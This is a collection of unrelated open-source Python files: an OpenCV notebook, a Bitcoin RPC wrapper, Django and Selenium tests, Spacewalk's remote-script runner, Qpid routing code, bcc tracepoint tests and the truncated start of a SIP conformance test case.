print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# so the first result (2 up ) sounds like the whole img got recognized, great. but retrying it with another word and empty shows we recognize almost everything. There are variations in value but they are pretty close, given all the noise around the image.
#
# i think we should:
# - straighten out the image
# - take a template just around the word bravo
# - then match against a straightened target image
# - the straightening may not be nec (may you write crooked) but template matching is on rects.
#
#
# ### Let's try this out with a hand made template without straightening
#
# In[7]:
template = cv2.imread('template.png') # used gimp to cut it
template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
plt.imshow(template)
# In[ ]:
def frame_img(img, dim):
"put image in a black frame so resulting image has shape dim"
framed = np.zeros(dim, dtype=img.dtype)
jx, jy = np.trunc((np.array(dim) - np.array(img.shape))/2).astype(int)
assert jx>0 and jy>0, "Image must be smaller than desired dimensions"
framed[jx:jx+img.shape[0], jy:jy+img.shape[1]] = img
return framed
def locate_template(img, template):
"Find template in image and produce stats + image "
img1 = img.copy()
# method = cv2.TM_SQDIFF, tried this first, works less well and gives numbers that are harder to
# interpret. For sqdiff, lower is better and non-id copies were around 1e6, alpha around 4e6
method = cv2.TM_CCOEFF_NORMED
w, h = template.shape[::-1]
res = cv2.matchTemplate(template,img1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img1,top_left, bottom_right, 128, 2)
print("best val, res.min, res.max:", min_val/1e6, res.min(), res.max())
#framed = frame_img(res, img1.shape)
# this does not work because the scale (min-max) of framed is very different from res.
#plt.imshow(np.concatenate([img1.astype(np.float32)*np.mean(framed), framed.astype(np.float32)]), cmap="gray")
plt.imshow(img1.astype(np.float32), cmap="gray")
return max_val, img1
value, _ = locate_template(writing1, template)
value
# In[ ]:
# for SQDIFF this one scored quite high, with COEFF_NORMED it is fine.
value, _ = locate_template(writingb, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writingc, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writing2, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(empty, template)
"value %2.2e" % value
# ## So we have to find that template and we are in business
# In[8]:
contours1.shape # shape of box shown in writing1
# In[9]:
def scale_contour(contour, scale):
"Shrinks or grows a contour by the given factor"
moments = cv2.moments(contour)
midX = int(round(moments["m10"] / moments["m00"]))
midY = int(round(moments["m01"] / moments["m00"]))
mid = np.array([midX,midY])
contour = contour - mid
contour = (contour * scale).astype(np.int32)
contour += mid
return contour
# In[14]:
c = contours1
dst = np.dstack([writing1.copy(), np.zeros_like(writing1), np.zeros_like(writing1)])
dst = cv2.drawContours(dst, [c], -1, (0,255,0), 3)
peri = 0.01 * cv2.arcLength(c, True) # approximate such that new perimeter is 1% of old one
approx = cv2.approxPolyDP(c, peri, True)
approx = scale_contour(approx, 0.8)
dst = cv2.drawContours(dst, [approx], -1, (0,175,0), 3)
imshow(dst)
#plt.imshow(dst, cmap="gray")
template1 =
# In[ ]:
# In[ ]:
img = np.zeros((141, 390,3), dtype=np.uint8)
img[:]=(240,240,240)
cv2.drawContours(img, [contours1], -1, (8,255,5), 3)
imshow(img)
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
| dirkjot/pingpongcam | opencv/exploration-3.py | Python | gpl-3.0 | 8,044 | 0.010816 |
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from btcrpc.utils.config_file_reader import ConfigFileReader
import json
import socket, errno
from btcrpc.utils.log import *
log = get_log("BTCRPCCall:")
class BTCRPCCall(object):
def __init__(self, wallet="receive", currency="btc"):
yml_config_reader = ConfigFileReader()
url = yml_config_reader.get_rpc_server(currency=currency, wallet=wallet)
self.access = AuthServiceProxy(url)
def do_getinfo(self):
return self.access.getinfo()
def do_get_new_address(self):
return self.access.getnewaddress();
def do_set_account(self, address, account):
return self.access.setaccount(address, account)
def do_get_transaction(self, txid):
try:
return self.access.gettransaction(txid)
except RuntimeError:
# return simplejson.dumps ({u'error' : u'txid is not valid'})
return None
def do_list_transactions(self, account, count=10, from_index=0):
try:
return self.access.listtransactions(account, count, from_index)
except RuntimeError:
print("calling failure")
def do_get_transaction(self, tx_id):
try:
return self.access.gettransaction(tx_id)
except RuntimeError:
#return simplejson.dumps ({u'error' : u'txid is not valid'})
return None
def amount_received_by_address(self, address="", confirms=0):
return self.access.getreceivedbyaddress(address, confirms)
def do_validate_address(self, address=""):
return self.access.validateaddress(address)
def list_transactions(self, account="", count=10, from_index=0):
return self.access.listtransactions(account, count, from_index)
def send_from(self, from_account="", to_address="", amount=0, minconf=1):
return self.access.sendfrom(from_account, to_address, amount, minconf)
def get_received_amount_by_account(self, account="", minconf=1):
return self.access.getreceivedbyaccount(account, minconf)
def get_balance(self, account="", minconf=1):
return self.access.getbalance(account, minconf)
def get_wallet_balance(self):
return self.access.getbalance()
def move(self, from_account="", to_account="", amount=0, minconf=1):
return self.access.move(from_account, to_account, amount, minconf)
def list_accounts(self, confirmations=1):
return self.access.listaccounts(confirmations)
def list_received_by_address(self, confirmations=1, include_empty=False):
return self.access.listreceivedbyaddress(confirmations, include_empty)
def get_addresses_by_account(self, account):
return self.access.getaddressesbyaccount(account)
def set_tx_fee(self, amount):
return self.access.settxfee(amount)
def send_to_address(self, address, amount, subtractfeefromamount=True):
return self.access.sendtoaddress(address, amount, "", "", subtractfeefromamount)
# amount is type of dictionary
def send_many(self, from_account="", minconf=1, **amounts):
log.info("From account: %s", from_account)
log.info("To accounts: %s", json.dumps(amounts))
amounts_string = json.dumps(amounts['amounts'])
amounts_object = json.loads(amounts_string)
try:
return True, self.access.sendmany(from_account, amounts_object, minconf)
except JSONRPCException as ex:
return False, ex
except socket.error as e:
return False, e
| BTCX/BTCX_blockchain | btcxblockchainapi/btcrpc/utils/btc_rpc_call.py | Python | mit | 3,371 | 0.009789 |
import random
import string
from collection.models import CollectionVersion, Collection
from concepts.models import Concept, ConceptVersion, LocalizedText
from oclapi.models import ACCESS_TYPE_EDIT, ACCESS_TYPE_VIEW
from orgs.models import Organization
from sources.models import Source, SourceVersion
from users.models import UserProfile
from mappings.models import Mapping, MappingVersion
from django.contrib.auth.models import User
from django.test import TestCase
class OclApiBaseTestCase(TestCase):
def setUp(self):
self._clear_fixtures()
self.user = create_user()
org_ocl = create_organization("OCL")
create_lookup_concept_classes(self.user, org_ocl)
def _clear_fixtures(self):
LocalizedText.objects.filter().delete()
ConceptVersion.objects.filter().delete()
Concept.objects.filter().delete()
MappingVersion.objects.filter().delete()
Mapping.objects.filter().delete()
SourceVersion.objects.filter().delete()
Source.objects.filter().delete()
CollectionVersion.objects.filter().delete()
Collection.objects.filter().delete()
Organization.objects.filter().delete()
UserProfile.objects.filter().delete()
User.objects.filter().delete()
def tearDown(self):
self._clear_fixtures()
def generate_random_string(length=5):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(length))
def create_localized_text(name, locale='en', type='FULLY_SPECIFIED', locale_preferred=False):
return LocalizedText(name=name, locale=locale, type=type, locale_preferred=locale_preferred)
def create_user():
suffix = generate_random_string()
user = User.objects.create_user(
username="test{0}".format(suffix),
password="test{0}".format(suffix),
email='user{0}@test.com'.format(suffix),
first_name='Test',
last_name='User'
)
create_user_profile(user)
# set password again as create_user hashed it
user.password = "test{0}".format(suffix)
return user
def create_user_profile(user):
suffix = generate_random_string()
mnemonic = user.username if user else 'user{0}'.format(suffix)
return UserProfile.objects.create(user=user, mnemonic=mnemonic)
def create_organization(name=None, mnemonic=None):
suffix = generate_random_string()
name = name if name else 'org{0}'.format(suffix)
mnemonic = mnemonic if mnemonic else name
return Organization.objects.create(name=name, mnemonic=mnemonic)
def create_source(user, validation_schema=None, organization=None, name=None):
suffix = generate_random_string()
source = Source(
name=name if name else "source{0}".format(suffix),
mnemonic=name if name else "source{0}".format(suffix),
full_name=name if name else "Source {0}".format(suffix),
source_type='Dictionary',
public_access=ACCESS_TYPE_EDIT,
default_locale='en',
supported_locales=['en'],
website='www.source.com',
description='This is a test source',
custom_validation_schema=validation_schema
)
if organization is not None:
kwargs = {
'parent_resource': organization
}
else:
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Source.persist_new(source, user, **kwargs)
return Source.objects.get(id=source.id)
def create_collection(user, validation_schema=None, name=None):
suffix = generate_random_string()
collection = Collection(
name=name if name else "collection{0}".format(suffix),
mnemonic=name if name else "collection{0}".format(suffix),
full_name=name if name else "Collection {0}".format(suffix),
collection_type='Dictionary',
public_access=ACCESS_TYPE_EDIT,
default_locale='en',
supported_locales=['en'],
website='www.collection2.com',
description='This is the second test collection',
custom_validation_schema=validation_schema
)
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Collection.persist_new(collection, user, **kwargs)
return Collection.objects.get(id=collection.id)
def create_concept(user, source, source_version=None, names=None, mnemonic=None, descriptions=None, concept_class=None, datatype=None,
force=False, extras=None):
suffix = generate_random_string()
if not names and not force:
names = [create_localized_text("name{0}".format(suffix))]
if not mnemonic and not force:
mnemonic = 'concept{0}'.format(suffix)
if not descriptions and not force:
descriptions = [create_localized_text("desc{0}".format(suffix))]
concept = Concept(
mnemonic=mnemonic,
updated_by=user,
datatype=datatype if datatype else "None",
concept_class=concept_class if concept_class else 'Diagnosis',
names=names,
descriptions=descriptions,
extras=extras
)
if source is not None:
kwargs = {
'parent_resource': source,
}
if source_version is not None:
kwargs['parent_resource_version'] = source_version
errors = Concept.persist_new(concept, user, **kwargs)
else:
errors = Concept.persist_new(concept, user)
return concept, errors
def create_mapping(user, source, from_concept, to_concept, map_type="SAME-AS", mnemonic=None):
mapping=None
if mnemonic:
mapping = Mapping(mnemonic=mnemonic, created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW,)
else:
mapping = Mapping(created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW, )
kwargs = {
'parent_resource': source,
}
Mapping.persist_new(mapping, user, **kwargs)
return Mapping.objects.get(id=mapping.id)
def create_lookup_concept_classes(user, org_ocl):
classes_source = create_source(user, organization=org_ocl, name="Classes")
datatypes_source = create_source(user, organization=org_ocl, name="Datatypes")
nametypes_source = create_source(user, organization=org_ocl, name="NameTypes")
descriptiontypes_source = create_source(user, organization=org_ocl, name="DescriptionTypes")
maptypes_source = create_source(user, organization=org_ocl, name="MapTypes")
locales_source = create_source(user, organization=org_ocl, name="Locales")
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Diagnosis")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Drug")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Test")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Procedure")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("None"), create_localized_text("N/A")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Numeric")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Coded")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Text")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("FULLY_SPECIFIED"), create_localized_text("Fully Specified")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("Short"), create_localized_text("SHORT")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("INDEX_TERM"), create_localized_text("Index Term")])
create_concept(user, nametypes_source, concept_class="NameType", names=[create_localized_text("None")])
create_concept(user, descriptiontypes_source, concept_class="DescriptionType", names=[create_localized_text("None")])
create_concept(user, descriptiontypes_source, concept_class="DescriptionType", names=[create_localized_text("FULLY_SPECIFIED")])
create_concept(user, descriptiontypes_source, concept_class="DescriptionType", names=[create_localized_text("Definition")])
create_concept(user, maptypes_source, concept_class="MapType",
names=[create_localized_text("SAME-AS"), create_localized_text("Same As")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Is Subset of")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Different")])
create_concept(user, maptypes_source, concept_class="MapType",
names=[create_localized_text("BROADER-THAN"), create_localized_text("Broader Than"),
create_localized_text("BROADER_THAN")])
create_concept(user, maptypes_source, concept_class="MapType",
names=[create_localized_text("NARROWER-THAN"), create_localized_text("Narrower Than"),
create_localized_text("NARROWER_THAN")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Q-AND-A")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("More specific than")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Less specific than")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Something Else")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("en")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("es")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("fr")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("tr")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("Abkhazian", "en")])
create_concept(user, locales_source, concept_class="Locale",names=[create_localized_text("English", "en")])
| snyaggarwal/oclapi | ocl/test_helper/base.py | Python | mpl-2.0 | 10,616 | 0.004333 |
#
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import os
import sys
import pwd
import grp
import time
import select
import signal
import tempfile
import base64
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# this is ugly, hopefully it will be natively supported in up2date
from actions.configfiles import _local_permission_check, _perm_error
from config_common import local_config
from config_common.rhn_log import set_logfile, log_to_file
sys.path.append('/usr/share/rhn')
from up2date_client import config
# this is a list of the methods that get exported by a module
__rhnexport__ = [
'run',
]
# action version we understand
ACTION_VERSION = 2
# SystemExit exception error code
SYSEXIT_CODE = 3
class SignalHandler:
def __init__(self):
self.gotSigterm = False
# Handle SIGTERM so that we can return status to Satellite
def handle(self, signal, frame):
self.gotSigterm = True
raise SystemExit(SYSEXIT_CODE)
def _create_script_file(script, uid=None, gid=None):
storageDir = tempfile.gettempdir()
script_path = os.path.join(storageDir, 'rhn-remote-script')
# Loop a couple of times to try to get rid of race conditions
for i in range(2):
try:
fd = os.open(script_path, os.O_RDWR | os.O_CREAT | os.O_EXCL, int("0700", 8))
# If this succeeds, break out the loop
break
except OSError:
e = sys.exc_info()[1]
if e.errno != 17: # File exists
raise
# File does exist, try to remove it
try:
os.unlink(script_path)
except OSError:
e = sys.exc_info()[1]
if e.errno != 2: # No such file or directory
raise
else:
# Tried a couple of times, failed; bail out raising the latest error
raise
sf = os.fdopen(fd, 'wb')
sf.write(script.encode("utf-8"))
sf.close()
if uid and gid:
os.chown(script_path, uid, gid)
return script_path
# Make sure the dir-path to a file exists
def _create_path(fpath):
d = os.path.dirname(fpath)
if d and not os.path.exists(d):
os.makedirs(d, int("0700", 8))
return os.path.exists(d)
def run(action_id, params, cache_only=None):
# Setup SIGTERM handler
sHandler = SignalHandler()
signal.signal(signal.SIGTERM, sHandler.handle)
cfg = config.initUp2dateConfig()
local_config.init('rhncfg-client', defaults=dict(cfg.items()))
tempfile.tempdir = local_config.get('script_tmp_dir')
logfile_name = local_config.get('script_log_file')
log_output = local_config.get('script_log_file_enable')
if log_output:
# If we're going to log, make sure we can create the logfile
_create_path(logfile_name)
if cache_only:
return (0, "no-ops for caching", {})
action_type = 'script.run'
if not _local_permission_check(action_type):
return _perm_error(action_type)
extras = {'output':''}
script = params.get('script')
if not script:
return (1, "No script to execute", {})
username = params.get('username')
groupname = params.get('groupname')
if not username:
return (1, "No username given to execute script as", {})
if not groupname:
return (1, "No groupname given to execute script as", {})
timeout = params.get('timeout')
if timeout:
try:
timeout = int(timeout)
except ValueError:
return (1, "Invalid timeout value", {})
else:
timeout = None
db_now = params.get('now')
if not db_now:
return (1, "'now' argument missing", {})
db_now = time.mktime(time.strptime(db_now, "%Y-%m-%d %H:%M:%S"))
now = time.time()
process_start = None
process_end = None
child_pid = None
# determine uid/ugid for script ownership, uid also used for setuid...
try:
user_record = pwd.getpwnam(username)
except KeyError:
return 1, "No such user %s" % username, extras
uid = user_record[2]
ugid = user_record[3]
# create the script on disk
try:
script_path = _create_script_file(script, uid=uid, gid=ugid)
except OSError:
e = sys.exc_info()[1]
return 1, "Problem creating script file: %s" % e, extras
# determine gid to run script as
try:
group_record = grp.getgrnam(groupname)
except KeyError:
return 1, "No such group %s" % groupname, extras
run_as_gid = group_record[2]
# create some pipes to communicate w/ the child process
(pipe_read, pipe_write) = os.pipe()
process_start = time.time()
child_pid = os.fork()
if not child_pid:
# Parent doesn't write to child, so close that part
os.close(pipe_read)
# Redirect both stdout and stderr to the pipe
os.dup2(pipe_write, sys.stdout.fileno())
os.dup2(pipe_write, sys.stderr.fileno())
# Close unnecessary file descriptors (including pipe since it's duped)
for i in range(3, MAXFD):
try:
os.close(i)
except:
pass
# all scripts initial working directory will be /
# puts burden on script writer to ensure cwd is correct within the
# script
os.chdir('/')
# the child process gets the desired uid/gid
os.setgid(run_as_gid)
groups=[g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
os.setgroups(groups)
os.setuid(uid)
# give this its own process group (which happens to be equal to its
# pid)
os.setpgrp()
# Finally, exec the script
try:
os.umask(int("022", 8))
os.execv(script_path, [script_path, ])
finally:
# This code can be reached only when script_path can not be
# executed as otherwise execv never returns.
# (The umask syscall always succeeds.)
os._exit(1)
# Parent doesn't write to child, so close that part
os.close(pipe_write)
output = None
timed_out = None
out_stream = tempfile.TemporaryFile()
while 1:
select_wait = None
if timeout:
elapsed = time.time() - process_start
if elapsed >= timeout:
timed_out = 1
# Send TERM to all processes in the child's process group
# Send KILL after that, just to make sure the child died
os.kill(-child_pid, signal.SIGTERM)
time.sleep(2)
os.kill(-child_pid, signal.SIGKILL)
break
select_wait = timeout - elapsed
# XXX try-except here for interrupted system calls
input_fds, output_fds, error_fds = select.select([pipe_read], [], [], select_wait)
if error_fds:
# when would this happen?
os.close(pipe_read)
return 1, "Fatal exceptional case", extras
if not (pipe_read in input_fds):
# Read timed out, should be caught in the next loop
continue
output = os.read(pipe_read, 4096)
if not output:
# End of file from the child
break
out_stream.write(output)
os.close(pipe_read)
# wait for the child to complete
(somepid, exit_status) = os.waitpid(child_pid, 0)
process_end = time.time()
# Copy the output from the temporary file
out_stream.seek(0, 0)
extras['output'] = out_stream.read()
out_stream.close()
# Log script-output locally, unless we're asked not to
if log_output :
set_logfile(logfile_name)
log_to_file(0, extras['output'])
# since output can contain chars that won't make xmlrpc very happy,
# base64 encode it...
extras['base64enc'] = 1
extras['output'] = base64.encodestring(extras['output'])
extras['return_code'] = exit_status
# calculate start and end times in db's timespace
extras['process_start'] = db_now + (process_start - now)
extras['process_end'] = db_now + (process_end - now)
for key in ('process_start', 'process_end'):
extras[key] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(extras[key]))
# clean up the script
os.unlink(script_path)
if timed_out:
return 1, "Script killed, timeout of %s seconds exceeded" % timeout, extras
if exit_status == 0:
return 0, "Script executed", extras
return 1, "Script failed", extras
| jhutar/spacewalk | client/tools/rhncfg/actions/script.py | Python | gpl-2.0 | 9,141 | 0.002297 |
# -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
# -*- coding: utf-8 -*-
"""@package src.wi.tests.cm_networks_test
@author Piotr Wójcik
@author Krzysztof Danielowski
@date 09.01.2013
"""
from wi.tests import WiTestCase
import unittest
class CMNetworksTests(WiTestCase, unittest.TestCase):
@staticmethod
def _test_add_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tfoot/tr/td/ul/li/a", ["Add pool"])
driver.find_element_by_link_text("Add pool").click()
self.wait_for_text("//div[@id='dialog-div']/form/div/fieldset/div/span", ["Pool address"])
driver.find_element_by_id("id_address").clear()
driver.find_element_by_id("id_address").send_keys("10.10.127.0")
driver.find_element_by_id("id_mask").clear()
driver.find_element_by_id("id_mask").send_keys("24")
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully added a pool."])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_unlock_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Unlock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to unlock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully unlocked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def _test_lock_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Lock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to lock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully locked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_delete_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Delete")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to delete pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully deleted pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def test_1_simple(self):
self._test_add_pool(self)
self._test_lock_pool()
self._test_unlock_pool(self)
self._test_delete_pool(self)
| Dev-Cloud-Platform/Dev-Cloud | dev_cloud/cc1/src/wi/tests/cm_networks_test.py | Python | apache-2.0 | 4,435 | 0.00203 |
from app_loader import app_loader
urlpatterns = app_loader.urlpatterns
| michaelkuty/python-app-loader | tests/testapp1/urls.py | Python | bsd-3-clause | 73 | 0 |
from django.core.management.base import NoArgsCommand
from django.contrib.auth.models import User
from api.models import EyeHistory
class Command(NoArgsCommand):
help = 'Detects and removes duplicated history entries'
def handle(self, **options):
self.stdout.write('Beginning update...\n')
users = User.objects.all()
for user in users:
self._delete_dup_history(user)
self.stdout.write('Update complete.\n')
def _delete_dup_history(self, user):
items = EyeHistory.objects.filter(user=user)
for item in items:
objs = EyeHistory.objects.filter(
user=user, url=item.url,
domain=item.domain, title=item.title,
total_time=item.total_time, src=item.src)
if objs.count > 1:
for obj in objs[1:]:
self.stdout.write('Deleting: %s\n' % item)
obj.delete()
| haystack/eyebrowse-server | common/management/commands/remove_duplicate_history.py | Python | mit | 949 | 0 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from .data import MessageRA, MessageLSU, MessageLSR
from ..dispatch import LOG_TRACE
class LinkStateEngine:
"""
This module is responsible for running the Link State protocol.
"""
def __init__(self, container):
self.container = container
self.node_tracker = container.node_tracker
self.id = self.container.id
self.ra_interval_stable = self.container.config.raIntervalSeconds
self.ra_interval_flux = self.container.config.raIntervalFluxSeconds
self.last_ra_time = 0
self.mobile_seq = 0
def set_mobile_seq(self, mobile_seq):
self.mobile_seq = mobile_seq
def tick(self, now):
interval = self.ra_interval_stable
if self.node_tracker.in_flux_mode(now):
interval = self.ra_interval_flux
if now - self.last_ra_time >= interval:
self.send_ra(now)
def handle_ra(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.ra_received(msg.id, msg.version, msg.ls_seq, msg.mobile_seq, msg.instance, now)
def handle_lsu(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.link_state_received(msg.id, msg.version, msg.ls, msg.instance, now)
def handle_lsr(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.router_learned(msg.id, msg.version)
my_ls = self.node_tracker.link_state
smsg = MessageLSU(None, self.id, my_ls.ls_seq, my_ls, self.container.instance)
self.container.send('amqp:/_topo/%s/%s/qdrouter' % (msg.area, msg.id), smsg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % smsg)
def send_lsr(self, _id):
msg = MessageLSR(None, self.id)
self.container.send('amqp:/_topo/0/%s/qdrouter' % _id, msg)
self.container.log_ls(LOG_TRACE, "SENT: %r to: %s" % (msg, _id))
def send_ra(self, now):
self.last_ra_time = now
ls_seq = self.node_tracker.link_state.ls_seq
msg = MessageRA(None, self.id, ls_seq, self.mobile_seq, self.container.instance)
self.container.send('amqp:/_topo/0/all/qdrouter', msg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % msg)
| ChugR/qpid-dispatch | python/qpid_dispatch_internal/router/link.py | Python | apache-2.0 | 3,006 | 0.002329 |
from google.appengine.ext import db
class MyEntity(db.Model):
name = db.StringProperty()
| toomoresuch/pysonengine | parts/gaeunit/sample_app/model.py | Python | mit | 92 | 0.021739 |
#!/usr/bin/env python
# Copyright (c) Sasha Goldshtein
# Licensed under the Apache License, Version 2.0 (the "License")
import bcc
import unittest
from time import sleep
import distutils.version
import os
import subprocess
def kernel_version_ge(major, minor):
# True if running kernel is >= X.Y
version = distutils.version.LooseVersion(os.uname()[2]).version
if version[0] > major:
return True
if version[0] < major:
return False
if minor and version[1] < minor:
return False
return True
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepoint(unittest.TestCase):
def test_tracepoint(self):
text = """
BPF_HASH(switches, u32, u64);
TRACEPOINT_PROBE(sched, sched_switch) {
u64 val = 0;
u32 pid = args->next_pid;
u64 *existing = switches.lookup_or_init(&pid, &val);
(*existing)++;
return 0;
}
"""
b = bcc.BPF(text=text)
sleep(1)
total_switches = 0
for k, v in b["switches"].items():
total_switches += v.value
self.assertNotEqual(0, total_switches)
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepointDataLoc(unittest.TestCase):
def test_tracepoint_data_loc(self):
text = """
struct value_t {
char filename[64];
};
BPF_HASH(execs, u32, struct value_t);
TRACEPOINT_PROBE(sched, sched_process_exec) {
struct value_t val = {0};
char fn[64];
u32 pid = args->pid;
struct value_t *existing = execs.lookup_or_init(&pid, &val);
TP_DATA_LOC_READ_CONST(fn, filename, 64);
__builtin_memcpy(existing->filename, fn, 64);
return 0;
}
"""
b = bcc.BPF(text=text)
subprocess.check_output(["/bin/ls"])
sleep(1)
self.assertTrue("/bin/ls" in [v.filename.decode()
for v in b["execs"].values()])
if __name__ == "__main__":
unittest.main()
| shodoco/bcc | tests/python/test_tracepoint.py | Python | apache-2.0 | 2,128 | 0.00282 |
#
# Copyright (C) 2004 SIPfoundry Inc.
# Licensed by SIPfoundry under the GPL license.
#
# Copyright (C) 2004 SIP Forum
# Licensed to SIPfoundry under a Contributor Agreement.
#
#
# This file is part of SIP Forum User Agent Basic Test Suite which
# belongs to the SIP Forum Test Framework.
#
# SIP Forum User Agent Basic Test Suite is free software; you can
# redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# SIP Forum User Agent Basic Test Suite is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SIP Forum User Agent Basic Test Suite; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# $Id: case207.py,v 1.2 2004/05/02 18:57:35 lando Exp $
#
from TestCase import TestCase
import NetworkEventHandler as NEH
import Log
class case207 (TestCase):
def config(self):
self.name = "Case 207"
self.description = "Content length larger than message"
self.isClient = True
self.transport = "UDP"
def run(self):
self.neh = NEH.NetworkEventHandler(self.transport)
inv = self.createRequest("INVITE")
